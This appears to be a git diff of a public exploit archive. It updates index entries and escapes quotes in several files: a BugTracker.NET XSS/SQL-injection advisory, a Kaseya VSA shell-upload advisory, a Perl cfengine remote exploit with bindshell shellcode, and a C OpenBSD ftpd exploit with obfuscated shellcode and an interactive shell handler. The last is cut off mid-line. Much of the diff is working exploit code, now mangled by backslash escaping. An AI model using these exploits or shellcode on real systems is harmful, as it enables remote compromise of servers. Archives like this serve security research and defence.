39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80 -39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 +39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 39517,platforms/windows/dos/39517.py,"FreeProxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - '.bmp' Crash (PoC)",2016-03-02,redknight99,windows,dos,0 @@ -35997,9 +35997,9 @@ id,file,description,date,author,platform,type,port 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 -39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 +39687,platforms/jsp/webapps/39687.txt,"Novell ServiceDesk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 -39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload",2016-04-13,"Zhou Yu",jsp,webapps,8088 +39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload",2016-04-13,"Zhou Yu",jsp,webapps,8088 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,unix,remote,0 39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0 @@ -36564,7 +36564,7 @@ id,file,description,date,author,platform,type,port 40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088 40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,jsp,webapps,8088 40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088 -40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0 +40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 @@ -36692,7 +36692,7 @@ id,file,description,date,author,platform,type,port 40586,platforms/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0 40587,platforms/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0 40588,platforms/multiple/local/40588.txt,"Oracle Netbeans IDE 8.1 - Directory Traversal",2016-10-20,hyp3rlinx,multiple,local,0 -40589,platforms/hardware/remote/40589.html,"MiCasa VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0 +40589,platforms/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0 40590,platforms/xml/webapps/40590.txt,"Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection",2016-10-20,"Jakub Palaczynski",xml,webapps,0 40591,platforms/php/webapps/40591.txt,"Classifieds Rental Script - SQL Injection",2016-10-20,"Arbin Godar",php,webapps,0 40592,platforms/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,windows,dos,0 @@ -36726,5 +36726,10 @@ id,file,description,date,author,platform,type,port 40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0 -40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 +40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0 +40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 +40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0 +40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0 +40637,platforms/php/webapps/40637.txt,"Joomla 3.4.4 - 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80 +40638,platforms/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos,0 diff --git a/platforms/asp/webapps/15653.txt b/platforms/asp/webapps/15653.txt index a8fcd1494..e7545dcb6 100755 --- a/platforms/asp/webapps/15653.txt +++ b/platforms/asp/webapps/15653.txt @@ -34,9 +34,9 @@ scripting and SQL-injection vulnerabilities were found in the following files of the BugTracker.NET: . *bugs.aspx*. SQL injection in line 141. - . *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30. + . *delete_query.aspx*. No sanitization for \'row_id.Value\' in line 30. . *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857. - . *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214. + . *edit_bug.aspx*. No sanitization for variable \'new_project\', line 2214. . *edit_bug.aspx*. XSS in line 2918. . *edit_comment.aspx*. XSS in line 233. . *edit_customfield.aspx*. Lines 165 and 172, no sanitization. @@ -68,7 +68,7 @@ and Alejandro Frydman from Core Security Technologies. [CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in similar ways. The following proof of concept shows how to exploit the -XSS founded in 'edit_comment.aspx': +XSS founded in \'edit_comment.aspx\': /----- ... @@ -76,9 +76,9 @@ XSS founded in 'edit_comment.aspx': 231
232 233 >back to <% -Response.Write(btnet.Util.get_setting("SingularBugLabel","bug")); %> -234
+Response.Write(Request[\"bug_id\"]);%>>back to <% +Response.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %> +234 235 236 ... @@ -89,30 +89,30 @@ bug. Then, edit it using this URL: /----- http://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E -----/ - As a result, the JavaScript code injected into the parameter 'bug_id' + As a result, the JavaScript code injected into the parameter \'bug_id\' will be rendered without sanitization in the line 233, and executed in -the context of the client's web browser. +the context of the client\'s web browser. 7.2. *SQL Injection Vulnerabilities* [CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be exploited in similar ways. Consider, for example, the code located in -'delete_query.aspx': +\'delete_query.aspx\': /----- ... 26 if (IsPostBack) 27 { 28 // do delete here -29 sql = @"delete queries where qu_id = $1"; -30 sql = sql.Replace("$1", row_id.Value); +29 sql = @\"delete queries where qu_id = $1\"; +30 sql = sql.Replace(\"$1\", row_id.Value); 31 btnet.DbUtil.execute_nonquery(sql); -32 Server.Transfer ("queries.aspx"); +32 Server.Transfer (\"queries.aspx\"); 33 } ... -----/ - In line 30, the value of 'row_id' is injected without sanitization into + In line 30, the value of \'row_id\' is injected without sanitization into the SQL query. This value arrives to the server in a hidden field of a client request. As a result, a malicious user can manipulate this value in order to execute code in the database layer of the application. @@ -170,7 +170,7 @@ project information and shared software tools for public use at: Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship +proactive process for securing their networks. The company\'s flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are diff --git a/platforms/asp/webapps/38351.txt b/platforms/asp/webapps/38351.txt index ababc1a0b..5d4650fff 100755 --- a/platforms/asp/webapps/38351.txt +++ b/platforms/asp/webapps/38351.txt @@ -1,7 +1,7 @@ Kaseya VSA is an IT management platform for small and medium corporates. From its console you can control thousands of computers and mobile devices. So that if you own the Kaseya server, you own the organisation. -With this post I'm also releasing two Metasploit modules ([E1], [E2]) +With this post I\'m also releasing two Metasploit modules ([E1], [E2]) and a Ruby file ([E3]) that exploit the vulnerabilities described below. A special thanks to ZDI for assisting with the disclosure of these @@ -28,12 +28,12 @@ Security (http://www.agileinfosec.co.uk/) Disclosure: 23/09/2015 / Last updated: 28/09/2015 >> Background on the affected product: -"Kaseya VSA is an integrated IT Systems Management platform that can be +\"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier -to show." +to show.\" A special thanks to ZDI for assisting with the vulnerability reporting process. @@ -52,7 +52,7 @@ VSA Version 9.0.0.0 â?? 9.0.0.18 VSA Version 9.1.0.0 â?? 9.1.0.8 GET /LocalAuth/setAccount.aspx -Page will attempt to redirect, ignore this and obtain the "sessionVal" +Page will attempt to redirect, ignore this and obtain the \"sessionVal\" value from the page which will be used in the following POST request. POST /LocalAuth/setAccount.aspx @@ -85,7 +85,7 @@ Cookie: sessionId= <... ASP shell here...> The path needs to be correct, but Kaseya is helpful enough to let us -know when a path doesn't exist. +know when a path doesn\'t exist. A Metasploit module that exploits this vulnerability has been released. #3 @@ -108,20 +108,20 @@ boundary=---------------------------114052411119142 Content-Length: 1501 -----------------------------114052411119142 -Content-Disposition: form-data; name="directory" +Content-Disposition: form-data; name=\"directory\" ../WebPages -----------------------------114052411119142 -Content-Disposition: form-data; name="ReferringWebWindowId" +Content-Disposition: form-data; name=\"ReferringWebWindowId\" 31a5d16a-01b7-4f8d-adca-0b2e70006dfa -----------------------------114052411119142 -Content-Disposition: form-data; name="request" +Content-Disposition: form-data; name=\"request\" uploadFile -----------------------------114052411119142 -Content-Disposition: form-data; name="impinf__uploadfilelocation"; -filename="shell.asp" +Content-Disposition: form-data; name=\"impinf__uploadfilelocation\"; +filename=\"shell.asp\" Content-Type: application/octet-stream <... ASP shell here...> diff --git a/platforms/bsd/remote/105.pl b/platforms/bsd/remote/105.pl index b656f7eb0..526b893f4 100755 --- a/platforms/bsd/remote/105.pl +++ b/platforms/bsd/remote/105.pl @@ -5,37 +5,37 @@ use IO::Socket; if(!$ARGV[1]) -{ print "usage: ./DSR-cfengine.pl (default cfengine is 5308)\n"; exit(-1); } +{ print \"usage: ./DSR-cfengine.pl (default cfengine is 5308)\\n\"; exit(-1); } $host = $ARGV[0]; $port = $ARGV[1]; -$nop = "\x90"; -$ret = pack("l",0xbfafe3dc); +$nop = \"\\x90\"; +$ret = pack(\"l\",0xbfafe3dc); $shellcode = -"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0". -"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02". -"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80". -"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57". -"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89". -"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50". -"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80". -"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56". -"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd". -"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f". -"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b". -"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80". -"\xeb\x9a"; +\"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\". +\"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\". +\"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\". +\"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\". +\"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\". +\"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\". +\"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\". +\"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\". +\"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\". +\"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\". +\"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\". +\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\". +\"\\xeb\\x9a\"; $buf = $nop x 2222 . $shellcode . $ret x 500; $socket = new IO::Socket::INET ( -Proto => "tcp", +Proto => \"tcp\", PeerAddr => $host, PeerPort => $port, ); -die "unable to connect to $host:$port ($!)\n" unless $socket; +die \"unable to connect to $host:$port ($!)\\n\" unless $socket; sleep(1); #you might have to adjust this on slow connections print $socket $buf; diff --git a/platforms/bsd/remote/234.c b/platforms/bsd/remote/234.c index 4bed46335..f371c9141 100755 --- a/platforms/bsd/remote/234.c +++ b/platforms/bsd/remote/234.c @@ -40,22 +40,22 @@ int verbose = 0; /* - Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask + Written by dvorak, garbled up by \"Smegma\" with a word xor 0xaabb mask to get rid of dots and slashes. */ char heavenlycode[] = -"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\xcd\x80" -"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff\xff\x50\xcf\xe5\x9b\x7b\xf -a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa5\xf9\xbf\xaf\xeb\x67\x3b\x2 -3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xbf\xa6\xeb\x67\x3b\x27\xe5\xb -4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x32\xec\x97\xf9\xbf\x91\xeb\x6 -7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x8 -5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\xd3"; +\"\\x31\\xc0\\x89\\xc1\\x80\\xc1\\x02\\x51\\x50\\x04\\x5a\\x50\\xcd\\x80\" +\"\\xeb\\x10\\x5e\\x31\\xc9\\xb1\\x4a\\x66\\x81\\x36\\xbb\\xaa\\x46\\x46\\xe2\\xf7\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\xff\\xff\\xff\\x50\\xcf\\xe5\\x9b\\x7b\\xf +a\\xbf\\xbd\\xeb\\x67\\x3b\\xfc\\x8a\\x6a\\x33\\xec\\xba\\xae\\x33\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\xb5\\x36\\xf4\\xa5\\xf9\\xbf\\xaf\\xeb\\x67\\x3b\\x2 +3\\x7a\\xfc\\x8a\\x6a\\xbf\\x97\\xeb\\x67\\x3b\\xfb\\x8a\\x6a\\xbf\\xa4\\xf3\\xfa\\x76\\x2a\\x36\\xf4\\xb9\\xf9\\x8a\\x6a\\xbf\\xa6\\xeb\\x67\\x3b\\x27\\xe5\\xb +4\\xe8\\x9b\\x7b\\xae\\x86\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\x8d\\x36\\xf4\\x93\\xf9\\x36\\xf4\\x9b\\x23\\xe5\\x82\\x32\\xec\\x97\\xf9\\xbf\\x91\\xeb\\x6 +7\\x3b\\x42\\x2d\\x55\\x44\\x55\\xfa\\xeb\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x8 +5\\x95\\x84\\x94\\x84\\x95\\xeb\\x94\\xc8\\xd2\\xc4\\x94\\xd9\\xd3\"; -char user[255] = "anonymous"; -char pass[255] = "anonymous@abc.com"; -char write_dir[PATH_MAX] = "/"; +char user[255] = \"anonymous\"; +char pass[255] = \"anonymous@abc.com\"; +char write_dir[PATH_MAX] = \"/\"; int ftpport = 21; unsigned long int ret_addr = 0; #define CMD_LOCAL 0 @@ -70,24 +70,24 @@ struct typeT { #define NUM_TYPES 2 struct typeT types[NUM_TYPES] = { - "OpenBSD 2.6", 0xdfbfd0ac, - "OpenBSD 2.7", 0xdfbfd0ac}; + \"OpenBSD 2.6\", 0xdfbfd0ac, + \"OpenBSD 2.7\", 0xdfbfd0ac}; void usage(char *program) { int i; fprintf(stderr, - "\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command] -[-C command]\n\n" - "Directory should be an absolute path, writable by the user.\n" - "The argument of -c will be executed on the remote host\n" - "while the argument of -C will be executed on the local\n" - "with its filedescriptors connected to the remote host\n" - "Valid types:\n", + \"\\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\\n\\t\\t[-r retaddr] [-c command] +[-C command]\\n\\n\" + \"Directory should be an absolute path, writable by the user.\\n\" + \"The argument of -c will be executed on the remote host\\n\" + \"while the argument of -C will be executed on the local\\n\" + \"with its filedescriptors connected to the remote host\\n\" + \"Valid types:\\n\", program); for (i = 0; i < NUM_TYPES; i++) { - printf("%d : %s\n", i, types[i].name); + printf(\"%d : %s\\n\", i, types[i].name); } exit(-1); } @@ -98,54 +98,54 @@ main(int argc, char **argv) unsigned int i; int opt, fd; unsigned int type = 0; - char *hostname = "localhost"; + char *hostname = \"localhost\"; if (argc < 2) usage(argv[0]); - while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) { + while ((opt = getopt(argc, argv, \"h:r:u:f:d:t:vp:c:C:\")) != -1) { switch (opt) { - case 'h': + case \'h\': hostname = optarg; break; - case 'C': + case \'C\': command = optarg; command_type = CMD_LOCAL; break; - case 'c': + case \'c\': command = optarg; command_type = CMD_REMOTE; break; - case 'r': + case \'r\': ret_addr = strtoul(optarg, NULL, 0); break; - case 'v': + case \'v\': verbose++; break; - case 'f': + case \'f\': if (!(ftpport = atoi(optarg))) { - fprintf(stderr, "Invalid destination port - %s\n", optarg); + fprintf(stderr, \"Invalid destination port - %s\\n\", optarg); exit(-1); } exit(-1); break; - case 'u': + case \'u\': strncpy(user, optarg, sizeof(user) - 1); user[sizeof(user) - 1] = 0x00; break; - case 'p': + case \'p\': strncpy(pass, optarg, sizeof(pass) - 1); pass[sizeof(pass) - 1] = 0x00; break; - case 'd': + case \'d\': strncpy(write_dir, optarg, sizeof(write_dir) - 1); write_dir[sizeof(write_dir) - 1] = 0x00; - if ((write_dir[0] != '/')) + if ((write_dir[0] != \'/\')) usage(argv[0]); - if ((write_dir[strlen(write_dir) - 1] != '/')) - strncat(write_dir, "/", sizeof(write_dir) - 1); + if ((write_dir[strlen(write_dir) - 1] != \'/\')) + strncat(write_dir, \"/\", sizeof(write_dir) - 1); break; - case 't': + case \'t\': type = atoi(optarg); if (type > NUM_TYPES) usage(argv[0]); @@ -160,7 +160,7 @@ main(int argc, char **argv) if ((fd = xconnect(hostname, ftpport)) == -1) exit(-1); else - printf("Connected to remote host! Sending evil codes.\n"); + printf(\"Connected to remote host! Sending evil codes.\\n\"); ftp_login(fd, user, pass); @@ -178,19 +178,19 @@ ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg) if (res == NULL) return 0; if (verbose) - printf("%s\n", res); - if (msg && (res[0] != '2')) { - fprintf(stderr, "%s\n", msg); + printf(\"%s\\n\", res); + if (msg && (res[0] != \'2\')) { + fprintf(stderr, \"%s\\n\", msg); exit(-1); } - return (res[0] != '2'); + return (res[0] != \'2\'); } void shell(int fd) { fd_set readfds; char buf[1]; - char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n"; + char *tst = \"echo ; echo ; echo HAVE FUN ; id ; uname -a\\n\"; write(fd, tst, strlen(tst)); while (1) { @@ -200,14 +200,14 @@ void shell(int fd) select(fd + 1, &readfds, NULL, NULL, NULL); if (FD_ISSET(0, &readfds)) { if (read(0, buf, 1) != 1) { - perror("read"); + perror(\"read\"); exit(1); } write(fd, buf, 1); } if (FD_ISSET(fd, &readfds)) { if (read(fd, buf, 1) != 1) { - perror("read"); + perror(\"read\"); exit(1); } write(1, buf, 1); @@ -228,7 +228,7 @@ void do_command(int fd) exit (2); } write(fd, command, strlen(command)); - write(fd, "\n", 1); + write(fd, \"\\n\", 1); while ((len = read(fd, buffer, sizeof(buffer))) > 0) { write(1, buffer, len); } @@ -242,10 +242,10 @@ void execute_command(fd) int exploit_ok(int fd) { char result[1024]; - xsend(fd, "id\n"); + xsend(fd, \"id\\n\"); xrecieve(fd, result, sizeof(result)); - return (strstr(result, "uid=") != NULL); + return (strstr(result, \"uid=\") != NULL); } void exploit(int fd) @@ -254,49 +254,49 @@ void exploit(int fd) int heavenlycode_s; char *dir = NULL; - ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir"); + ftp_cmd_err(fd, \"CWD\", write_dir, res, 1024, \"Can\'t CWD to write_dir\"); - dir = strcreat(dir, "A", 255 - strlen(write_dir)); - ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); - ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); + dir = strcreat(dir, \"A\", 255 - strlen(write_dir)); + ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); + ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); xfree(&dir); /* next on = 256 */ - dir = strcreat(dir, "A", 255); - ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); - ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); + dir = strcreat(dir, \"A\", 255); + ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); + ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); xfree(&dir); /* next on = 512 */ heavenlycode_s = strlen(heavenlycode); - dir = strcreat(dir, "A", 254 - heavenlycode_s); + dir = strcreat(dir, \"A\", 254 - heavenlycode_s); dir = strcreat(dir, heavenlycode, 1); - ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); - ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); + ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); + ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); xfree(&dir); /* next on = 768 */ dir = strcreat(dir, longToChar(ret_addr), 252 / 4); - ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); - ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); + ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); + ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); xfree(&dir); /* length = 1020 */ - /* 1022 moet " zijn */ - dir = strcreat(dir, "AAA\"", 1); - ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); - ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); + /* 1022 moet \" zijn */ + dir = strcreat(dir, \"AAA\\\"\", 1); + ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); + ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); xfree(&dir); /* and tell it to blow up */ - ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL); + ftp_cmd_err(fd, \"PWD\", NULL, res, 1024, NULL); if (!exploit_ok(fd)) { if (command != NULL) { exit (2); } - fprintf(stderr, "Exploit failed\n"); + fprintf(stderr, \"Exploit failed\\n\"); exit (1); } if (command == NULL) @@ -346,7 +346,7 @@ xrealloc(void *ptr, size_t size) char *wittgenstein_was_a_drunken_swine; if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) { - fprintf(stderr, "Cannot calculate universe\n"); + fprintf(stderr, \"Cannot calculate universe\\n\"); exit(-1); } return (wittgenstein_was_a_drunken_swine); @@ -367,7 +367,7 @@ xmalloc(size_t size) char *heidegger_was_a_boozy_beggar; if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) { - fprintf(stderr, "Out of cheese error\n"); + fprintf(stderr, \"Out of cheese error\\n\"); exit(-1); } return (heidegger_was_a_boozy_beggar); @@ -382,7 +382,7 @@ xconnect(char *host, u_short port) int fd; if ((he = gethostbyname(host)) == NULL) { - perror("gethostbyname"); + perror(\"gethostbyname\"); return (-1); } memset(&s_in, 0, sizeof(s_in)); @@ -391,11 +391,11 @@ xconnect(char *host, u_short port) memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { - perror("socket"); + perror(\"socket\"); return (-1); } if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) { - perror("connect"); + perror(\"connect\"); return (-1); } return fd; @@ -409,20 +409,20 @@ ftp_login(int fd, char *user, char *password) int rep; xrecieveall(fd, reply, sizeof(reply)); if (verbose) { - printf("Logging in ..\n"); - printf("%s\n", reply); + printf(\"Logging in ..\\n\"); + printf(\"%s\\n\", reply); } - xsendftpcmd(fd, "USER", user); + xsendftpcmd(fd, \"USER\", user); xrecieveall(fd, reply, sizeof(reply)); if (verbose) - printf("%s\n", 